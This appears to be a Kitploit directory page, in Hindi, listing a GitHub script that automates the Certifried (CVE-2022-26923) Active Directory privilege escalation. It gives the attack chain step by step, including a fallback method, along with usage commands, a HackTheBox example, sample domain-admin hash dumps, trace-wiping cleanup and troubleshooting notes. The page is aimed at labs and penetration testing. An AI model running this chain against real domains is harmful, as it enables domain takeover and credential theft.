Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26923 — Automated CVE-2022-26923 Exploitation (Certifried) | Kitploit
उपकरण/GitHubGitHub/nefhara/cve-2022-26923
Privilege EscalationVulnerability AnalysisExploitationPost-ExploitationCTFPenetration TestingAuthenticationLearning & EducationLabs & Practice
GitHubnefhara/cve-2022-26923

CVE-2022-26923

Automated CVE-2022-26923 Exploitation (Certifried)

2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2022-26923 – Certifried एक्सप्लॉइट (AD CS दुरुपयोग)

CVE-2022-26923 (Certifried) का स्वचालित दोहन, जो Active Directory Certificate Services (AD CS) के दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि को सक्षम बनाता है, Resource-Based Constrained Delegation (RBCD) के लिए स्वचालित फ़ॉलबैक के साथ, अंततः एक डोमेन व्यवस्थापक खाते का NTLM हैश निकालता है।

⚠️ केवल शैक्षिक उद्देश्यों के लिए / लैब / CTF

अनधिकृत वातावरण में उपयोग न करें।


🎯 विवरण

यह स्क्रिप्ट निम्नलिखित आक्रमण श्रृंखला को स्वचालित करती है:

विधि 1 — क्लासिक (CVE प्रत्यक्ष दोहन)

  1. एक नियंत्रित मशीन खाता बनाएँ (टकराव से बचने के लिए यादृच्छिक नाम)
  2. डोमेन कंट्रोलर से मेल खाने के लिए dNSHostName विशेषता को स्पूफ करें
  3. AD CS के माध्यम से मशीन प्रमाणपत्र का अनुरोध करें
  4. प्रमाणपत्र का उपयोग करके प्रमाणीकरण करें → PKINIT के माध्यम से DC का NTLM हैश निकालें
  5. DC हैश का उपयोग करके secretsdump.py के साथ DCSync आक्रमण करें

विधि 2 — फ़ॉलबैक (RBCD) (यदि विधि 1 विफल हो तो स्वचालित)

  1. bloodyAD के साथ उपयोग के लिए PFX को PEM में बदलें
  2. DC पर Resource-Based Constrained Delegation (RBCD) कॉन्फ़िगर करें
  3. impacket-addspn के माध्यम से समझौता किए गए मशीन खाते में SPN जोड़ें
  4. getST.py के साथ S4U2Self + S4U2Proxy टिकट का अनुरोध करें
  5. केर्बरोस टिकट का उपयोग करके secretsdump.py के माध्यम से NTLM हैश डंप करें

🔗 भेद्यता

  • CVE-2022-26923 – "Certifried" — CVSS 8.8 (उच्च)
  • AD CS चलाने वाले Active Directory वातावरण को प्रभावित करता है
  • एक निम्न-विशेषाधिकार वाले उपयोगकर्ता को dNSHostName विशेषता में हेरफेर करके डोमेन कंट्रोलर के रूप में प्रतिरूपण करने की अनुमति देता है, जिससे CA DC खाते के लिए प्रमाणपत्र जारी कर देता है

🛠 प्रयुक्त उपकरण


📦 निर्भरता स्थापना

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 उपयोग

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [options]

उपलब्ध विकल्प

root@kitploit:~
-d, --dc-ip     IP address of the Domain Controller
-D, --domain    Domain name (e.g. corp.local)
-u, --user      Valid domain user (UPN format: user@domain)
-p, --pass      User password
--verbose       Debug mode: display all executed commands
-h, --help      Show this help message

🧠 उदाहरण (HTB Certifried)

root@kitploit:~
./CVE-2022-26923.sh \
  -d 10.129.227.189 \
  -D certifried.htb \
  -u [email protected] \
  -p 'Ch4ng3m3!' \
  --verbose

सुझाव: चलाने से पहले, निम्न का उपयोग करके सटीक CA नाम और टेम्पलेट पहचानें:

root@kitploit:~
certipy-ad find -u 'user@domain' -p 'Password' -target dc.domain -ns <DC_IP> -stdout

फिर तदनुसार स्क्रिप्ट डिफ़ॉल्ट में CA_NAME और TEMPLATE अपडेट करें।


🔥 अपेक्षित आउटपुट

वातावरण के आधार पर, दो में से एक मार्ग सफल होगा:

विधि 1 (क्लासिक):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [SUCCESS]
[+] NTLM Hash of the Domain Controller recovered: aad3b435b51404eeaad3b435b51404ee:6f9d...

[6] DCSync of administrator via secretsdump...
administrator:500:aad3b435...:<nthash>:::

विधि 2 (RBCD फ़ॉलबैक):

root@kitploit:~
[5] Classic authentication attempt (Recovering DC hash)...    [FAILED]
[*] Switching to Fallback method (RBCD + SPN)...

[Fallback-5] Running secretsdump via RBCD ticket...
administrator:500:aad3b435...:<nthash>:::

OPSEC सफ़ाई अंत में (या Ctrl+C पर) स्वचालित रूप से चलती है:

root@kitploit:~
[*] Starting trace cleanup (OPSEC)...
    [OK] Cleanup complete.

🏗 आंतरिक आक्रमण प्रवाह

root@kitploit:~
Random Machine Account Creation (e.g. PWN8472$)
              ↓
    dNSHostName Spoofing → dc.domain.local
              ↓
  Dynamic LDAP Sync Verification (polling)
              ↓
  Certificate Request via RPC (Machine Template)
    [NETBIOS timeout auto-retry up to 5x]
              ↓
┌─────────────────────────────────────────┐
│         METHOD 1 — CLASSIC              │
│   certipy-ad auth -pfx dc.pfx           │
│   → DC NTLM hash via PKINIT             │
│   → DCSync via secretsdump              │
└────────────────┬────────────────────────┘
                 │ [FAILS]
                 ▼
┌─────────────────────────────────────────┐
│         METHOD 2 — RBCD FALLBACK        │
│   PFX → PEM conversion (openssl)        │
│   bloodyAD: add rbcd dc$ COMP$          │
│   impacket-addspn: SPN on COMP$         │
│   getST: S4U2Self + S4U2Proxy (cifs/)   │
│   secretsdump via KRB5 ticket           │
└─────────────────────────────────────────┘
              ↓
 OPSEC Cleanup (trap EXIT/INT/TERM)
   - Remove RBCD attribute on DC
   - Delete machine account (COMP$)
   - Wipe local PFX / PEM / ccache files

🔧 ज्ञात समस्याएँ और समस्या निवारण


⚠️ अस्वीकरण

यह परियोजना निम्न के लिए प्रदान की गई है:

  • शैक्षिक और अनुसंधान उद्देश्यों
  • व्यक्तिगत लैब वातावरण
  • CTF / HackTheBox / Capture-The-Flag चुनौतियाँ
  • अधिकृत पैठ परीक्षण कार्य (लिखित अनुमोदन के साथ)

लेखक इस उपकरण के किसी भी अनधिकृत या अवैध उपयोग के लिए कोई दायित्व नहीं मानता है।

टूल डाउनलोड करें
उपकरणउद्देश्य
certipy-adखाता निर्माण/अद्यतन, प्रमाणपत्र अनुरोध, PKINIT प्रमाणीकरण
bloodyADRBCD विशेषता हेरफेर (फ़ॉलबैक)
impacket-addspnमशीन खाते पर SPN जोड़ना (फ़ॉलबैक)
impacket-getSTS4U2Self + S4U2Proxy टिकट अनुरोध (फ़ॉलबैक)
impacket-secretsdumpDCSync / NTLM हैश डंप
opensslPFX → PEM रूपांतरण (फ़ॉलबैक)
लक्षणकारणसमाधान
NETBIOS connection timed outHTB पर AD CS RPC अंतरालस्वचालित रूप से नियंत्रित (5 पुनर्प्रयास)
KDC_ERR_BADOPTION getST परCOMP$ पर SPN गायबस्क्रिप्ट अब getST से पहले impacket-addspn का उपयोग करती है
KDC_ERR_WRONG_REALM secretsdump परगलत SPN (LDAP बनाम cifs)स्क्रिप्ट getST के लिए cifs/ SPN का उपयोग करती है
Clock skew too greatकेर्बरोस समय विचलनचलाने से पहले sudo ntpdate <DC_IP>
मशीन खाता विलोपन विफलअपर्याप्त AD अधिकार (सामान्य)स्क्रिप्ट `
unrecognized arguments certipy-ad के साथगलत सिंटैक्स (पुराना certipy प्रारूप)स्क्रिप्ट स्पष्ट फ़्लैग -u/-p/-target-ip का उपयोग करती है